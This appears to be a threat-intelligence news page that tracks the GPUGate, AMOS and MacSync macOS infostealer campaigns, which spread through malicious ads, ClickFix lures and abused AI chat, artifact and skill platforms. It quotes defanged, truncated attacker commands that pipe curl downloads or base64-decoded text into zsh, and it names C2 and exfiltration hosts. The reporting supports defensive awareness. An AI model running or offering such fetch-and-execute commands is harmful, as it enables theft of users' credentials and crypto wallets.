CyberHappenings logo
Home Browse Watchlists Experimental About

Track cybersecurity events as they unfold. Sourced timelines. Filter, sort, and browse. Fast, privacy‑respecting. No invasive ads, no tracking.

GPUGate Malware Campaign Targets IT Firms in Western Europe

First reported
Last updated
3 unique sources, 9 articles

Summary

Hide ▲

The **GPUGate malware campaign** continues to evolve, now leveraging **Claude AI artifacts and Google Ads** to distribute **MacSync and AMOS infostealers** via **ClickFix attacks**. Over **15,600 users** have accessed malicious Claude-generated guides, which instruct victims to execute Terminal commands fetching malware payloads. This follows earlier waves abusing **ChatGPT/Grok chats, fake GitHub repositories, and malvertising** to deploy stealers targeting credentials, crypto wallets, and system data. The campaign, active since **April 2023**, has expanded from traditional phishing to **abusing AI ecosystems, supply-chain weaknesses, and trusted platforms** (e.g., Homebrew, LogMeIn, AI assistants). Russian-speaking actors operate **AMOS as a Malware-as-a-Service (MaaS)**, with stolen logs sold in underground markets to fuel fraud, ransomware, and account takeovers. The latest **Claude artifact abuse** underscores the shift toward **high-impact, scalable distribution channels**, exploiting weak platform vetting and user trust in AI-generated content. Organizations should monitor for **suspicious Terminal activity, C2 traffic to domains like `a2abotnet[.]com`, and unauthorized data egress** while educating users on **ClickFix-style lures** and unverified AI tool instructions.

Timeline

  1. 13.02.2026 22:21 1 articles · 23h ago

    Claude AI artifacts abused in ClickFix attacks distributing MacSync infostealer

    Threat actors are now **abusing Claude AI artifacts**—publicly shared, unverified LLM-generated content—to distribute the **MacSync infostealer** via **ClickFix attacks**. Malicious Google Ads promote these artifacts for queries like "online DNS resolver" and "macOS CLI disk space analyzer," directing users to **Claude-hosted guides or fake Apple Support pages** on Medium. The guides instruct victims to paste **obfuscated Terminal commands** (`echo "..." | base64 -D | zsh` or `curl -SsLfk "https://raxelpak[.]com/..." | zsh`), fetching a **second-stage payload** from the same C2 (`raxelpak[.]com`). The **MacSync infostealer** exfiltrates data (Keychain, browser sessions, crypto wallets) to `a2abotnet[.]com/gate` as a ZIP archive (`/tmp/osalogging.zip`), with **fallback chunked uploads** if initial exfiltration fails. Over **15,600 users** accessed one malicious artifact, with views rising from 12,300 in days, indicating rapid victim exposure. This tactic **expands prior LLM abuse** (ChatGPT/Grok chats) and demonstrates threat actors’ adaptability in exploiting **new AI platforms** for scalable malware distribution. The **same operator** likely controls both command variants, given shared C2 infrastructure.

    Show sources
    Open in new tab
  2. 12.02.2026 16:25 1 articles · 2d ago

    AMOS infostealer exploits AI assistant ecosystem via ClawHavoc campaign

    A new **ClawHavoc campaign** targets macOS users by poisoning the **OpenClaw and ClawHub AI assistant skill marketplace** with malicious add-ons (e.g., crypto tools, productivity utilities, Google Workspace integrations). These add-ons deploy the AMOS infostealer, which exfiltrates credentials, browser sessions, SSH keys, and cryptocurrency wallet data. The campaign exploits weak marketplace vetting and the popularity of AI tools, highlighting how threat actors adapt distribution channels to maximize infections. This follows earlier AMOS campaigns abusing **ChatGPT shared chats, fake GitHub repositories, and Google Ads** to deploy malware via ClickFix-style social engineering.

    Show sources
    Open in new tab
  3. 04.02.2026 09:42 2 articles · 10d ago

    Microsoft warns of expanding macOS infostealer campaigns

    Microsoft has warned that information-stealing attacks are rapidly expanding beyond Windows to target Apple macOS environments by leveraging cross-platform languages like Python and abusing trusted platforms for distribution at scale. The tech giant's Defender Security Research Team observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like **Atomic macOS Stealer (AMOS), MacSync, and DigitStealer**. **New developments** confirm the trend’s acceleration: threat actors now abuse **Claude AI artifacts** (public LLM-generated guides) and **Google Ads** to push **MacSync infostealers** via ClickFix lures, with over **15,600 users** exposed to a single malicious artifact. The campaigns use techniques like **fileless execution, native macOS utilities (e.g., `osascript`), and AppleScript automation** to facilitate data theft, including **browser credentials, iCloud Keychain, crypto wallets, and session data**. The starting point remains **malicious ads** (e.g., for 'HomeBrew,' 'DNS resolver tools') that redirect users to **fake support pages or AI-generated guides**, tricking them into executing Terminal commands that deploy malware.

    Show sources
    Open in new tab
  4. 18.10.2025 18:02 2 articles · 3mo ago

    New malware payloads AMOS and Odyssey target macOS developers

    The campaign targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms. The campaign employs 'ClickFix' techniques to trick targets into executing commands in Terminal. The campaign uses Google Ads to drive traffic to malicious sites and promote them in Google Search results. The malicious sites feature convincing download portals for fake apps and instruct users to copy a curl command in their Terminal to install them. The commands fetch and decode an 'install.sh' file, which downloads a payload binary, removing quarantine flags and bypassing Gatekeeper prompts. The payload is either AMOS or Odyssey, executed on the machine after checking if the environment is a virtual machine or an analysis system. The malware invokes sudo to run commands as root and collects detailed hardware and memory information of the host. The malware manipulates system services like killing OneDrive updater daemons and interacts with macOS XPC services to blend its malicious activity with legitimate processes. The malware harvests sensitive information stored on the browser, cryptocurrency credentials, and exfiltrates to the command and control (C2).

    Show sources
    Open in new tab
  5. 22.09.2025 22:44 2 articles · 4mo ago

    Threat actors view Mac users as low-hanging fruit

    The threat actors may view Mac users as a low-hanging fruit due to the perception that Macs face fewer malware threats. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025.

    Show sources
    Open in new tab
  6. 22.09.2025 18:36 3 articles · 4mo ago

    AMOS malware adds backdoor for persistent access

    The Atomic (AMOS) malware now includes a backdoor component, giving attackers persistent, stealthy access to compromised systems. The AMOS malware is a malware-as-a-service operation available for $1,000/month, with stolen logs traded in underground markets for follow-on attacks. The latest **ClawHavoc campaign** demonstrates its evolving distribution tactics, bundling AMOS within malicious OpenClaw AI assistant add-ons to harvest credentials, crypto wallet data, and system information.

    Show sources
    Open in new tab
  7. 20.09.2025 10:07 4 articles · 4mo ago

    GPUGate campaign expands to macOS users through fake GitHub repositories

    The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. The campaign now targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms.

    Show sources
    Open in new tab
  8. 08.09.2025 18:02 7 articles · 5mo ago

    GPUGate Malware Campaign Targets IT Firms in Western Europe

    The campaign has targeted a range of companies across the technology and financial sectors, including LastPass. The fake GitHub pages were created on September 16, 2025, and were immediately submitted for takedown. The campaign uses SEO poisoning to ensure the fake repositories are positioned well in search results. The campaign has been active since at least April 2023, with previous similar campaigns observed in July 2025. The campaign now targets macOS developers with fake Homebrew, LogMeIn, and TradingView platforms. A new AMOS infostealer campaign abuses Google search ads to lure users into Grok and ChatGPT conversations that lead to installing the AMOS malware on macOS. The campaign was first spotted by researchers at Kaspersky, with a more detailed report by Huntress. The ClickFix attack begins with victims searching for macOS-related terms, leading to malicious instructions in AI chats. The malicious instructions are hosted on legitimate LLM platforms and contain commands to install the malware. The base64-encoded URL decodes into a bash script that loads a fake password prompt dialog. The script validates, stores, and uses the provided password to execute privileged commands, including downloading and executing the AMOS infostealer. AMOS was first documented in April 2023 and is a malware-as-a-service (MaaS) operation targeting macOS systems exclusively. AMOS added a backdoor module earlier this year, allowing operators to execute commands, log keystrokes, and drop additional payloads. AMOS is dropped as a hidden file and scans for cryptocurrency wallets, browser data, macOS Keychain data, and files on the filesystem. Persistence is achieved via a LaunchDaemon running a hidden AppleScript that restarts the malware if terminated. Users are advised to be vigilant and avoid executing commands they found online, especially if they don't fully understand what they do. Kaspersky noted that asking ChatGPT if the provided instructions are safe reveals they are not. Microsoft has warned that information-stealing attacks are rapidly expanding beyond Windows to target Apple macOS environments by leveraging cross-platform languages like Python and abusing trusted platforms for distribution at scale. The tech giant's Defender Security Research Team observed macOS-targeted infostealer campaigns using social engineering techniques such as ClickFix since late 2025 to distribute disk image (DMG) installers that deploy stealer malware families like Atomic macOS Stealer (AMOS), MacSync, and DigitStealer. The campaigns use techniques like fileless execution, native macOS utilities, and AppleScript automation to facilitate data theft, including web browser credentials and session data, iCloud Keychain, and developer secrets. The starting point of these attacks is often a malicious ad, often served through Google Ads, that redirects users searching for tools like DynamicLake and artificial intelligence (AI) tools to fake sites that employ ClickFix lures, tricking them into infecting their own machines with malware.

    Show sources
    Open in new tab

Information Snippets

Similar Happenings

Fake AI Assistant Extensions in Google Chrome Web Store Exfiltrate Credentials and Monitor Emails

Over 260,000 Google Chrome users downloaded fake AI assistant extensions that steal login credentials, monitor emails, and enable remote access. Researchers at LayerX identified over 30 malicious extensions as part of a coordinated campaign called AiFrame. The extensions mimicked popular AI assistants like Claude AI, ChatGPT, Grok, and Google Gemini. The campaign used extension spraying to evade takedowns, directing users to remote infrastructure to avoid detection. The extensions exfiltrate data from Chrome and Gmail to attacker-controlled servers. LayerX warns that these extensions act as general-purpose access brokers, capable of harvesting data and monitoring user behavior. Many extensions have been removed from the Chrome Web Store, but users who downloaded them remain at risk. Additionally, cybersecurity researchers have discovered a malicious Google Chrome extension named CL Suite by @CLMasters (ID: jkphinfhmfkckkcnifhjiplhfoiefffl) that steals TOTP codes for Facebook and Meta Business accounts, Business Manager contact lists, and analytics data. The extension exfiltrates data to infrastructure controlled by the threat actor, including a backend at getauth[.]pro and a Telegram channel. The extension has 33 users as of writing and was first uploaded to the Chrome Web Store on March 1, 2025. About 500,000 VKontakte users have had their accounts silently hijacked through Chrome extensions masquerading as VK customization tools. The large-scale campaign has been codenamed VK Styles. The malware embedded in the extensions is designed to engage in active account manipulation by automatically subscribing users to the attacker's VK groups, resetting account settings every 30 days to override user preferences, manipulating CSRF tokens to bypass VK's security protections, and maintaining persistent control. The activity has been traced to a threat actor operating under the GitHub username 2vk, who has relied on VK's own social network to distribute malicious payloads and build a follower base through forced subscriptions. A report published by Q Continuum found a huge collection of 287 Chrome extensions that exfiltrate browsing history to data brokers. These extensions have 37.4 million installations, representing roughly 1% of the global Chrome userbase.

Open in new tab

China-Linked Amaranth-Dragon Exploits WinRAR Flaw in Southeast Asian Espionage Campaigns

Amaranth-Dragon, a China-linked threat actor, has conducted targeted espionage campaigns against government and law enforcement agencies in Southeast Asia throughout 2025. The group exploited CVE-2025-8088, a WinRAR vulnerability, to deliver malicious payloads, including the Havoc C2 framework and TGAmaranth RAT. The campaigns were timed to coincide with sensitive political and security events, demonstrating a high degree of stealth and operational discipline. The group's tactics, tools, and procedures (TTPs) show strong links to APT41, suggesting a shared ecosystem or resource pool. The attackers leveraged the vulnerability within days of its disclosure in August 2025 and used the Havoc Framework as the Command and Control (C&C) platform.

Open in new tab

341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer

A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These addons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands which then steals crypto assets like exchange API keys, wallet private keys, SSH credentials, and browser passwords.

Open in new tab

Android Malware Campaign Abuses Hugging Face Platform

A new Android malware campaign leverages the Hugging Face platform to distribute thousands of variants of an APK payload designed to steal credentials from popular financial and payment services. The attack begins with a dropper app called TrustBastion, which uses scareware-style ads to lure victims into installing it. The malware then redirects to a Hugging Face repository to download the final payload, using server-side polymorphism to evade detection. The malware exploits Android’s Accessibility Services to capture screenshots, monitor user activity, and steal credentials. The campaign was discovered by Bitdefender researchers, who found over 6,000 commits in the repository. The repository was taken down but resurfaced under a new name, 'Premium Club,' with the same malicious code. Bitdefender has published indicators of compromise and informed Hugging Face, which removed the malicious datasets. The infection chain begins when users download the malicious Android app TrustBastion, which appears as scareware via popups claiming the device is infected with malware. The dropper app prompts users to run an update that mimics legitimate Google Play and Android system update dialog boxes. The dropper contacts an encrypted endpoint hosted at trustbastion[.]com, which returns an HTML file containing a redirect link to the Hugging Face repository hosting the malware. The malware masquerades as a 'Phone Security' feature to guide users through enabling Accessibility Services. The malware requests permissions for screen recording, screen casting, and overlay display to monitor all user activity and capture screen content. The malware captures lockscreen information for security verification of financial and payment services.

Open in new tab

Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace

A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.

Open in new tab